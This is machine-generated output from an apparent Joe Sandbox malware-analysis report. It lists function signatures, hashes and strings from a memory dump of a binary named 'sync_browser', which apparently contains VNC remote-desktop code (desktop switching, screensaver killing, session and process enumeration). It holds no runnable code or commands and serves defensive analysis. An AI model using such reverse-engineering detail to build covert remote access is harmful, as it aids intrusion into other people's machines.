                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Desktop$CloseEnumFindInfoMessageOpenParametersPostSystemVersionWindowWindows
                                                    • String ID: Screen-saver$WindowsScreenSaverClass$vncdesktop.cpp : KillScreenSaver...$vncdesktop.cpp : Killing ScreenSaver
                                                    • API String ID: 1547096108-1130181218
                                                    • Opcode ID: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
                                                    • Instruction ID: 296369b72b3f225242666374a8975beeeb1c58cac0df393259fdbee1efe51e28
                                                    • Opcode Fuzzy Hash: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
                                                    • Instruction Fuzzy Hash: C3315065A2869287FA64BB25E820BADA750FF98F44FC44033DD0E07699DF3CE119C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc$CountCriticalInitializeSectionTick
                                                    • String ID: 0$GetSystemTimes$NtQuerySystemInformation$kernel32.dll$ntdll.dll
                                                    • API String ID: 649669561-4005017345
                                                    • Opcode ID: 074b37e70411e8fa4c2f927709ee4b204295ab1398dd26aff7224720a389b37b
                                                    • Instruction ID: 7bd82a04dd81bda1b4aacaebc25043ed33c6b2c0238732dd65436e8ed8f961c8
                                                    • Opcode Fuzzy Hash: 074b37e70411e8fa4c2f927709ee4b204295ab1398dd26aff7224720a389b37b
                                                    • Instruction Fuzzy Hash: 18211C32A15B5587EB48AF28E844668A7E0FF88F98FC44136DD5D46398DF3CD444C760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalEventSection$EnterLeaveObjectResetSingleWait
                                                    • String ID: c
                                                    • API String ID: 295735435-112844655
                                                    • Opcode ID: fa268cb6b2df6a727f3079fd17a88c909c0169f6597272d12e4c6e15257d5989
                                                    • Instruction ID: ed7d3efefbae668ceaa5eced0208a6450f33afead65571a760914aec6b03e30f
                                                    • Opcode Fuzzy Hash: fa268cb6b2df6a727f3079fd17a88c909c0169f6597272d12e4c6e15257d5989
                                                    • Instruction Fuzzy Hash: 88210C26A28B4187DA24AB25F4540AEA770FB88F90FC04033DF8E53A65DF3CE445C750
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$CountEnterLeaveTick
                                                    • String ID:
                                                    • API String ID: 1056156058-0
                                                    • Opcode ID: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
                                                    • Instruction ID: fe6ac6fdb55ceb854ffdbd6fa8663c942b0f0cd5f903316d86bbdbc34208c190
                                                    • Opcode Fuzzy Hash: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
                                                    • Instruction Fuzzy Hash: 8DD11836A09B568AEB14DF69E4446ACBBE4FB84B88FC14036DE4C57B68DF38E411C750
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Combine$DataDeleteObjectRegion$free
                                                    • String ID:
                                                    • API String ID: 1378972593-0
                                                    • Opcode ID: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
                                                    • Instruction ID: ef4ac9f59ab51572cd43977dcb604475c03d90b1851b7e72421f718645e3d4c3
                                                    • Opcode Fuzzy Hash: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
                                                    • Instruction Fuzzy Hash: F7717FB660568187EB50DF2AD4406AEBBA0FB88FD8B849032DE4D87754DF3DD581CB40
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteObjectfree$CombineCriticalSection$CreateEnterLeaveRect
                                                    • String ID:
                                                    • API String ID: 707770685-0
                                                    • Opcode ID: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
                                                    • Instruction ID: d99469b7baa8eb019614c86a2e0b92f0f7074e1eb2a7c3635b7acc85f59475a9
                                                    • Opcode Fuzzy Hash: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
                                                    • Instruction Fuzzy Hash: E1417D26618A4187E754AB29E4882ADB760FBC9FD4FC40232EE5E477A8CF3CD944C710
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Combine$DeleteObjectfree$CreateRect
                                                    • String ID:
                                                    • API String ID: 3143477926-0
                                                    • Opcode ID: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
                                                    • Instruction ID: 79138df25acd2736773429e283b231717ee49eede4722a2e5f944b552b74d17f
                                                    • Opcode Fuzzy Hash: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
                                                    • Instruction Fuzzy Hash: 31417072618A8282DA50EB25E4548AEBB24FFC9FD8FC05122EE4E57768CF3CD545C710
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: sprintf$CriticalInitializeSection$_errno_invalid_parameter_noinfo
                                                    • String ID: 0.0.0$12-12-2002$Plugin.dsm$Someone$Unknown
                                                    • API String ID: 524037307-261918508
                                                    • Opcode ID: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
                                                    • Instruction ID: 1533306b40925a972186b5f7d1cb46994c0e06c5c22365fb157ce3822c56174d
                                                    • Opcode Fuzzy Hash: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
                                                    • Instruction Fuzzy Hash: 0021CC72515B8692D705DF34E9805ECB3ACFF54F88FC84136EA4C5A6A9DF349295C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close$DesktopHandle$CriticalInputLeaveOpenSection
                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                    • API String ID: 4065787043-3977938048
                                                    • Opcode ID: 04e07c99e75fd332ae890d3068c7bd0c23d8647f6ad6a6f5c875c601342f21c4
                                                    • Instruction ID: 17e4bf867a62696d990ea0c45b481f301d67bef2def1df1053d6a55dd8072551
                                                    • Opcode Fuzzy Hash: 04e07c99e75fd332ae890d3068c7bd0c23d8647f6ad6a6f5c875c601342f21c4
                                                    • Instruction Fuzzy Hash: 8DE1D322A086D186F794AB25C448BBEABA1EB85F98FD44236DE5C473E5CF38D451C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Desktop$CloseInputOpen
                                                    • String ID: disabled$enabled$vncclient.cpp : rfbSetServerInput: inputs %s$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                    • API String ID: 1367241101-2270697846
                                                    • Opcode ID: edf9ddcd9a44aa48138f766378103f1c8a97073988da45d501d29b27bb572098
                                                    • Instruction ID: 7fd7bf73d2b369b69462f9663cdad1f6a74350714ec82b31bf6c34b8549ce6f3
                                                    • Opcode Fuzzy Hash: edf9ddcd9a44aa48138f766378103f1c8a97073988da45d501d29b27bb572098
                                                    • Instruction Fuzzy Hash: BDD1A022A086D186EB90EB25C458BFDABA1EB85F88FD94033DE4C477A5CF39D455C720
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: WTSEnumerateProcessesA$WTSFreeMemory$winlogon.exe$wtsapi32
                                                    • API String ID: 145871493-4162899161
                                                    • Opcode ID: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
                                                    • Instruction ID: dbf84bad0eb83bb33fb864449c55a360597b50d4863ea1e13e00ea0c5c681a41
                                                    • Opcode Fuzzy Hash: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
                                                    • Instruction Fuzzy Hash: 12417B36609B4287E664AF15A8406BDB6A4FBC5FA4FD44236DD5D03798EF38E845C320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadProc
                                                    • String ID: Console$WTSEnumerateSessionsA$WTSFreeMemory$wtsapi32
                                                    • API String ID: 145871493-4083478734
                                                    • Opcode ID: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
                                                    • Instruction ID: 58dddcfe8fec2b091c49d66d615f9501da2928cc3b1ab6b3d37a540490fb1061
                                                    • Opcode Fuzzy Hash: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
                                                    • Instruction Fuzzy Hash: 89418E22A09B5287EB64AF55E84067EA2A4FF84F94FD80137DD5D43794DF38E844C724
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ThreadWindow$CloseCurrentEventHandleMessageObjectOpenPostPrioritySingleSleepWait
                                                    • String ID: VncEvent
                                                    • API String ID: 2428488660-2681191898
                                                    • Opcode ID: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
                                                    • Instruction ID: b7c0c572739a473d66bd6dfd11db5301ba4b299474e8394dd360d38abce261f2
                                                    • Opcode Fuzzy Hash: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
                                                    • Instruction Fuzzy Hash: E311B210E1C61647FB48BB35A958B7D9691AFCAF85FCC4032CD0E13654DF3C94458721
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free$_errno$EnvironmentVariable__wtomb_environ_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 101574016-0
                                                    • Opcode ID: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
                                                    • Instruction ID: 760b87e41a232bc269a00fcd5680be9510b78c79974d7daf9cd4f9e08d72c7e7
                                                    • Opcode Fuzzy Hash: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
                                                    • Instruction Fuzzy Hash: 73A1B961E0AB5243FA65BB25A90027DA694AF81F9CFD49636DE1D0B7C9DF3CF4418320
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true
                                                    • Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
